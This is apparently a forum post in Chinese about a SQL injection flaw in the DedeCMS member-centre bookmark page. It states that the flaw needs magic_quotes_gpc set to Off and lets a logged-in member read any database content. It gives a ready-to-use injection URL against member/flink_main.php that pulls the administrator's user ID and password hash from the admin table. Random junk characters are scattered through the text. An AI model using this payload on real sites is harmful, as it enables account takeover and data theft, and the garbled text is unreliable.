DedeCMS会员中心SQL注射漏洞
: T* s t# b* ?! a7 c需要magic_quotes_gpc = Off
2 s8 ^6 v, T3 I- v会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.$ G& G d* w. P/ \
" t# L+ a+ F5 Y9 f3 N$ EDedeCMS会员中心书签管理SQL注射漏洞+ _4 X5 N3 k8 v1 l; h6 e/ p1 s
成功利用该漏洞可获得管理员密码
; p8 e; }- D0 g8 W+ A 3 L" J4 d& x. f' o
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
3 i4 ^. d" L: j) Q, `
5 v. W3 S7 L+ }2 r9 r3 q( Y' ehttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r4 Q; I$ T4 E9 o2 @& o& v' t
|